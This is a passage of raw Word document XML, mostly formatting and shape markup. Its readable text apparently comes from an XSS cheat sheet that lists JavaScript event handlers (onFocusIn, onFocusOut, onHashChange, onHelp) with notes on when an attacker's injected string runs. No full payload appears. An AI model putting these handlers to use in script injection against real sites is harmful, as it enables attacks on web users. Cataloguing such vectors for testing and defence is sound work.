      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>executes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>gets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>focus)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504"/>
          <w:tab w:val="left" w:pos="1506"/>
        </w:tabs>
        <w:ind w:hanging="1316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292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633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1033" name="Group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154"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1034" name="Freeform 1036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336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2906 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2927 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2927 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2909 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2906 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 997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" name="Text Box 103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onFocusIn()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34" o:spid="_x0000_s1398" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:49.85pt;height:9.15pt;z-index:-17623552;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154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">
                <v:shape id="Freeform 1036" o:spid="_x0000_s1399" style="position:absolute;left:1930;top:154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r2YMUA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi9SN1Yi9SYVcQgeGgL1fY+Zsck&#10;JDsbs5uY/vtuQehtHu9zks1gatFT60rLCmbTCARxZnXJuYKv0/7pFYTzyBpry6Tghxxs1qOHBGNt&#10;b/xJ/dHnIoSwi1FB4X0TS+myggy6qW2IA3exrUEfYJtL3eIthJtaPkfRQhosOTQU2NCuoKw6dkbB&#10;+3Up07SutpOPt0vnuvP3ea5nSj2Oh+0KhKfB/4vv7oMO86P5C/x9E06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ivZgxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m976,182r-955,l18,182,,161r,-3l,21,21,,976,r21,21l997,161r-18,21l976,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="976,336;21,336;18,336;0,315;0,312;0,175;21,154;976,154;997,175;997,315;979,336;976,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1035" o:spid="_x0000_s1400" type="#_x0000_t202" style="position:absolute;left:1930;top:154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IncQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYQq91aSWSrs1ioiCUJCu20OP0824&#10;G9xM1k3U9d8boeBtHu9zJrPeNeJEXbCeNbwMFQji0hvLlYafYvX8DiJEZIONZ9JwoQCz6eBhgpnx&#10;Z87ptI2VSCEcMtRQx9hmUoayJodh6FvixO185zAm2FXSdHhO4a6RI6XG0qHl1FBjS4uayv326DTM&#10;fzlf2sPm7zvf5bYoPhR/jfdaPz32808Qkfp4F/+71ybNV69vcPsmnS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DCJ3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onFocusIn()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(attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>executes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>gets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>focus)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589"/>
          <w:tab w:val="left" w:pos="1590"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:left="1589" w:hanging="1400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344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687070" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1030" name="Group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070" cy="116205"/>
                          <a:chOff x="1930" y="166"/>
                          <a:chExt cx="1082" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1031" name="Freeform 1033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1082" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2991 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1082"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1082"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1082"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1082"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1082"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1082"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1082"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2991 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1082"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3012 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1082"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3012 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1082"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2994 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1082"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2991 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1082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2" h="183">
                                <a:moveTo>
                                  <a:pt x="106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061" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1064" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="106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Text Box 103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108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onFocusOut()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31" o:spid="_x0000_s1401" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:54.1pt;height:9.15pt;z-index:-17623040;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166" coordsize="108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">
                <v:shape id="Freeform 1033" o:spid="_x0000_s1402" style="position:absolute;left:1930;top:166;width:1082;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="108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fP0sMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYYTealYFWVajqGAptAdrvfQ2bGY3&#10;i5vJksR121/fCEJv83ifs9oMthU9+dA4VjCdZCCIS6cbrhWcvw4vOYgQkTW2jknBDwXYrEdPKyy0&#10;u/En9adYixTCoUAFJsaukDKUhiyGieuIE1c5bzEm6GupPd5SuG3lLMsW0mLDqcFgR3tD5eV0tQpq&#10;+7qzh/cqNx9n9L/XY5/PvyulnsfDdgki0hD/xQ/3m07zs/kU7t+k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fP0sMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1061,182l21,182r-3,l,161r,-3l,21,21,,1061,r21,21l1082,161r-18,21l1061,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1061,348;21,348;18,348;0,327;0,324;0,187;21,166;1061,166;1082,187;1082,327;1064,348;1061,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1032" o:spid="_x0000_s1403" type="#_x0000_t202" style="position:absolute;left:1930;top:166;width:108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qQ6cMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYQRvNamC1K1RRFoQhNJ1PfQ43Yy7&#10;wc1k3URd/31TKHibx/ucxap3jbhSF6xnDS9jBYK49MZypeFQfDy/gggR2WDjmTTcKcBqOXhaYGb8&#10;jXO67mMlUgiHDDXUMbaZlKGsyWEY+5Y4cUffOYwJdpU0Hd5SuGvkRKmZdGg5NdTY0qam8rS/OA3r&#10;b87f7fnz5ys/5rYo5op3s5PWo2G/fgMRqY8P8b97a9J8NZ3A3zfp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qQ6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onFocusOut()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(attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>executes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>looses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>focus)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757"/>
          <w:tab w:val="left" w:pos="1758"/>
        </w:tabs>
        <w:ind w:left="1757" w:hanging="1568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395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795020" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1027" name="Group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5020" cy="116205"/>
                          <a:chOff x="1930" y="154"/>
                          <a:chExt cx="1252" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1028" name="Freeform 1030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1252" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3161 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1252"/>
                              <a:gd name="T2" fmla="+- 0 336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1252"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1252"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1252"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1252"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1252"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1252"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3161 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1252"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3182 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1252"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3182 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1252"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3164 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1252"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3161 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1252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52" h="183">
                                <a:moveTo>
                                  <a:pt x="123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231" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1234" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123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Text Box 102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1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onHashChange()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8" o:spid="_x0000_s1404" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:62.6pt;height:9.15pt;z-index:-17622528;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154" coordsize="125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">
                <v:shape id="Freeform 1030" o:spid="_x0000_s1405" style="position:absolute;left:1930;top:154;width:1252;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="125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7IYMQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCQAyF7wv+hyGCt3WqC7JUR1FBsCfR1XvsxLba&#10;ydTOrNZ/bw4Le0t4L+99mS06V6sHtaHybGA0TEAR595WXBg4/mw+v0GFiGyx9kwGXhRgMe99zDC1&#10;/sl7ehxioSSEQ4oGyhibVOuQl+QwDH1DLNrFtw6jrG2hbYtPCXe1HifJRDusWBpKbGhdUn47/DoD&#10;X5PuFDb2sjuds+2rWrlsdL9mxgz63XIKKlIX/81/11sr+MlYcOUbGUHP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eyGDEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m1231,182l21,182r-3,l,161r,-3l,21,21,,1231,r21,21l1252,161r-18,21l1231,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1231,336;21,336;18,336;0,315;0,312;0,175;21,154;1231,154;1252,175;1252,315;1234,336;1231,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1029" o:spid="_x0000_s1406" type="#_x0000_t202" style="position:absolute;left:1930;top:154;width:125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eURcQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPyxR6q7v1IDW6ESkKhUIxxoPHaXaS&#10;LGZnY3ar6b93C4Xe5vE+Z7UeXSeuNATrWcPLVIEgrryx3Gg4lrvnVxAhIhvsPJOGHwqwzicPK8yM&#10;v3FB10NsRArhkKGGNsY+kzJULTkMU98TJ672g8OY4NBIM+AthbtOzpSaS4eWU0OLPb21VJ0P307D&#10;5sTF1l4+v/ZFXdiyXCj+mJ+1fnocN0sQkcb4L/5zv5s0X80W8PtNOkH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XlEXEAAAA3Q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onHashChange()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(fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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fragment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>identifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>part</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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document's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>current</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>changed)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252"/>
          <w:tab w:val="left" w:pos="1253"/>
        </w:tabs>
        <w:spacing w:before="161"/>
        <w:ind w:left="1252" w:hanging="1063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446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471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1024" name="Group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167"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1025" name="Freeform 1027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349 167"/>
                              <a:gd name="T3" fmla="*/ 349 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 349 167"/>
                              <a:gd name="T7" fmla="*/ 349 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 349 167"/>
                              <a:gd name="T11" fmla="*/ 349 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 328 167"/>
                              <a:gd name="T15" fmla="*/ 328 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 325 167"/>
                              <a:gd name="T19" fmla="*/ 325 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 188 167"/>
                              <a:gd name="T23" fmla="*/ 188 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 167 167"/>
                              <a:gd name="T27" fmla="*/ 167 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2650 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 167 167"/>
                              <a:gd name="T31" fmla="*/ 167 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2671 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 188 167"/>
                              <a:gd name="T35" fmla="*/ 188 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2671 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 328 167"/>
                              <a:gd name="T39" fmla="*/ 328 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2653 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 349 167"/>
                              <a:gd name="T43" fmla="*/ 349 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2650 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 742"/>
                              <a:gd name="T46" fmla="+- 0 349 167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Text Box 102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onHelp()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5" o:spid="_x0000_s1407" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.35pt;width:37.1pt;height:9.15pt;z-index:-17622016;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,167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">
